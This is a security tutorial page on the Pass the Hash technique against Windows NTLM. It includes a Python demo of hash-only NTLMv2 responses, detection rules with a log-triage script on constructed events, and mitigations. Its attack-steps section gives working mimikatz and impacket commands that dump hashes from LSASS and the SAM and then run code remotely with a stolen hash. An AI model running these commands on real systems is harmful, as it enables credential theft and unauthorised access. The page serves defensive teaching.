what is it?
Pass the Hash (PtH) is a technique that authenticates as a user with their captured NT hash (commonly called the NTLM hash) instead of their plaintext password. NTLM challenge-response never transmits the password: the client proves possession of the hash by keying the challenge response with it, so whoever holds the hash can produce a valid response. An attacker with a valid hash can therefore authenticate to any service that accepts NTLM: SMB, WMI, RDP when Restricted Admin mode is enabled, and more.
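The following is an added example, not code from the original page or from any tool it mentions. It shows in working code why the hash is the credential: it computes the NT hash (MD4 over the UTF-16LE password) and then derives an NTLMv2 challenge response from the hash alone, exactly as a pass-the-hash client does, so a client that knows only the hash and a client that knows the password produce identical responses. MD4 is implemented inline because OpenSSL 3 builds of hashlib hide it behind the legacy provider; the user, domain, server challenge and blob bytes are constructed sample values.

```python
"""Added example: the NT hash alone is a complete NTLM credential."""
import hmac
import hashlib
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(message: bytes) -> bytes:
    """MD4 per RFC 1320 (pure Python, so it runs without OpenSSL's legacy provider)."""
    padded = message + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)
    padded += struct.pack("<Q", (len(message) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(padded), 64):
        x = struct.unpack("<16I", padded[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1: F(b,c,d) = (b & c) | (~b & d), words in order
            f = (b & c) | (~b & d)
            a, b, c, d = d, _rotl((a + f + x[i]) & _MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: G = majority, word order 0,4,8,12,1,5,9,13,...
            k = (i % 4) * 4 + i // 4
            g = (b & c) | (b & d) | (c & d)
            a, b, c, d = d, _rotl((a + g + x[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: H = xor, word order 0,8,4,12,2,10,6,14,...
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, _rotl((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4]), b, c
        h = [(v + w) & _MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password. Unsalted, so it is a reusable credential."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr as in MS-NLMP 3.3.2, keyed only by the NT hash.

    ResponseKeyNT = HMAC_MD5(nt_hash, UTF16LE(upper(user) + domain))
    NTProofStr    = HMAC_MD5(ResponseKeyNT, ServerChallenge + blob)
    The plaintext password is never needed, which is what makes PtH possible.
    """
    response_key = hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(response_key, server_challenge + blob, hashlib.md5).digest()


def pass_the_hash_matches(password: str, captured_hash_hex: str, user: str, domain: str) -> bool:
    """True when a client holding only captured_hash_hex produces the same NTLMv2
    response as a client that knows the password. Challenge and blob are constructed."""
    server_challenge = bytes.fromhex("0123456789abcdef")  # assumed; normally sent by the server
    blob = bytes.fromhex("01010000" + "00" * 4 + "00" * 8 + "aaaaaaaaaaaaaaaa" + "00" * 4)  # assumed minimal blob
    from_password = ntlmv2_proof(nt_hash(password), user, domain, server_challenge, blob)
    from_hash = ntlmv2_proof(bytes.fromhex(captured_hash_hex), user, domain, server_challenge, blob)
    return hmac.compare_digest(from_password, from_hash)


if __name__ == "__main__":
    h = nt_hash("password")
    print("NT hash of 'password':", h.hex())
    print("hash-only client matches password client:",
          pass_the_hash_matches("password", h.hex(), "admin", "CORP"))
```

The point to take from `ntlmv2_proof` is that the password enters the protocol only through `nt_hash`, and that hash is stored unsalted in the SAM, in NTDS.dit and in LSASS memory; anywhere it can be read, it can be replayed.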
requirements
- A captured NT hash for the account (dumped from LSASS with mimikatz, from the SAM or NTDS.dit with secretsdump, or similar)
- Network access to the target service (445/tcp for the SMB-based tools below)
- Target must accept NTLM authentication (most Windows environments still do); the account also needs the rights the tool relies on, e.g. psexec.py and wmiexec.py need local admin on the target, and for local accounts other than the built-in RID-500 Administrator, remote UAC filtering blocks admin access over the network unless LocalAccountTokenFilterPolicy is set to 1
attack steps
1. obtain a hash
# dump from lsass on a compromised host (needs SeDebugPrivilege, i.e. local admin)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

# remote dump of SAM/LSA secrets (and NTDS.dit on a DC) via impacket, using a known password
secretsdump.py domain/user:password@target
2. authenticate with the hash
# psexec with hash; -hashes takes LMHASH:NTHASH, the LM half can be left empty
psexec.py -hashes :ntlmhash domain/user@target

# wmiexec (no service binary dropped on the target, quieter than psexec)
wmiexec.py -hashes :ntlmhash domain/user@target

# smbclient (file share access only, no code execution)
smbclient.py -hashes :ntlmhash domain/user@target
detection
- Event ID 4624 with LogonType 3 (network) and AuthenticationPackageName NTLM for an account or host pair where Kerberos would be expected, e.g. a domain account reaching a domain-joined host that was addressed by hostname
- Event ID 4776 (NTLM credential validation) on the domain controller for domain accounts, or on the target itself for local accounts, from a source workstation that is not a known domain host
- Mismatched workstation names or unusual source IPs for privileged accounts; WorkstationName in NTLM events is supplied by the client, so compare it against what the source IP should be
- On the source host, mimikatz sekurlsa::pth leaves a 4624 with LogonType 9 (NewCredentials), LogonProcessName seclogo and AuthenticationPackageName Negotiate; runas /netonly looks the same, so treat it as a lead rather than proof
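An added example of the detection logic above run over sample events; it is not from the original page and the log records are constructed, already parsed into dicts the way a SIEM or Get-WinEvent export would deliver them. Field names follow the 4624/4776 event XML (LogonType, AuthenticationPackageName, LmPackageName, WorkstationName, IpAddress, LogonProcessName, Workstation). The host inventory, the privileged-account list and the rule names are assumptions for the example.

```python
"""Added example: triage of Windows logon events for pass-the-hash indicators."""
from collections import Counter

# Constructed inventory: which workstation name belongs to which source IP,
# and which accounts are privileged enough to care about.
KNOWN_HOSTS = {"10.0.1.20": "WS01", "10.0.1.21": "WS02", "10.0.1.5": "DC01"}
PRIVILEGED = {"da_admin", "svc_backup"}

# Constructed sample events, not real logs.
SAMPLE_EVENTS = [
    # Normal Kerberos network logon from a known workstation: nothing to flag.
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "jdoe", "TargetDomainName": "CORP",
     "AuthenticationPackageName": "Kerberos", "LmPackageName": "-",
     "WorkstationName": "WS01", "IpAddress": "10.0.1.20", "LogonProcessName": "Kerberos"},
    # NTLM network logon for a domain admin from an IP whose claimed workstation name
    # does not match the inventory: the psexec.py/wmiexec.py -hashes footprint.
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "da_admin", "TargetDomainName": "CORP",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "WorkstationName": "KALI", "IpAddress": "10.0.1.99", "LogonProcessName": "NtLmSsp "},
    # mimikatz sekurlsa::pth on the source host: NewCredentials logon through seclogo.
    {"EventID": 4624, "LogonType": 9, "TargetUserName": "da_admin", "TargetDomainName": "CORP",
     "AuthenticationPackageName": "Negotiate", "LmPackageName": "-",
     "WorkstationName": "WS02", "IpAddress": "::1", "LogonProcessName": "seclogo"},
    # Legitimate NTLM (e.g. a share opened by IP address) from a known host, low-priv user.
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "jdoe", "TargetDomainName": "CORP",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "WorkstationName": "WS02", "IpAddress": "10.0.1.21", "LogonProcessName": "NtLmSsp "},
    # DC-side NTLM credential validation for the same privileged account and unknown source.
    {"EventID": 4776, "TargetUserName": "da_admin", "Workstation": "KALI", "Status": "0x0"},
]


def is_ntlm_network_logon(ev):
    return (ev.get("EventID") == 4624 and ev.get("LogonType") == 3
            and ev.get("AuthenticationPackageName") == "NTLM")


def workstation_mismatch(ev):
    """WorkstationName is client-supplied in NTLM; compare it to what the source IP should be."""
    expected = KNOWN_HOSTS.get(ev.get("IpAddress"))
    return expected is None or expected.upper() != str(ev.get("WorkstationName", "")).upper()


def pth_findings(events):
    """Return (rule, account, detail) tuples; each rule corresponds to one detection bullet."""
    known_names = {name.upper() for name in KNOWN_HOSTS.values()}
    findings = []
    for ev in events:
        acct = ev.get("TargetUserName", "")
        if is_ntlm_network_logon(ev) and acct in PRIVILEGED:
            findings.append(("ntlm_for_privileged_account", acct, ev["IpAddress"]))
        if is_ntlm_network_logon(ev) and workstation_mismatch(ev):
            findings.append(("workstation_ip_mismatch", acct,
                             f"{ev['WorkstationName']}@{ev['IpAddress']}"))
        if (ev.get("EventID") == 4624 and ev.get("LogonType") == 9
                and ev.get("LogonProcessName", "").strip().lower() == "seclogo"):
            findings.append(("sekurlsa_pth_on_source", acct, ev.get("WorkstationName", "")))
        if (ev.get("EventID") == 4776 and acct in PRIVILEGED
                and ev.get("Workstation", "").upper() not in known_names):
            findings.append(("dc_ntlm_validation_unknown_source", acct, ev["Workstation"]))
    return findings


def rule_counts(events):
    """How many hits each rule produced, useful for tuning noise per rule."""
    return Counter(rule for rule, _, _ in pth_findings(events))


if __name__ == "__main__":
    for finding in pth_findings(SAMPLE_EVENTS):
        print(finding)
```

Run on the sample set, the Kerberos logon and the NTLM logon from a known host for a low-privilege user produce nothing, while the privileged NTLM logon from an unknown source trips two rules at once; in practice the privileged-account rule is the one worth paging on, and the workstation mismatch rule needs an accurate inventory before it is anything but noise.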
mitigation
- Add privileged accounts to the Protected Users security group; members cannot authenticate with NTLM at all (Kerberos only, no RC4, no delegation), so their hash is useless for PtH, and their credentials are not cached on hosts they log on to
- Disable NTLM where possible via GPO (Network security: Restrict NTLM: Incoming NTLM traffic, Outgoing NTLM traffic to remote servers, NTLM authentication in this domain); turn on the matching Audit NTLM policies first and review the NTLM operational log, because legacy applications and access by IP address still fall back to NTLM
- Use Credential Guard to isolate LSASS secrets so hashes cannot be read from lsass memory, and enable LSA protection (RunAsPPL) so ordinary processes cannot open lsass; RunAsPPL alone is bypassable with a signed driver, so pair it with Credential Guard
- Enforce tiered administration so Tier 0 hashes are never cached on lower-tier hosts; randomise local administrator passwords with LAPS and keep the UAC remote restriction (LocalAccountTokenFilterPolicy = 0) so a dumped local admin hash does not work across the fleet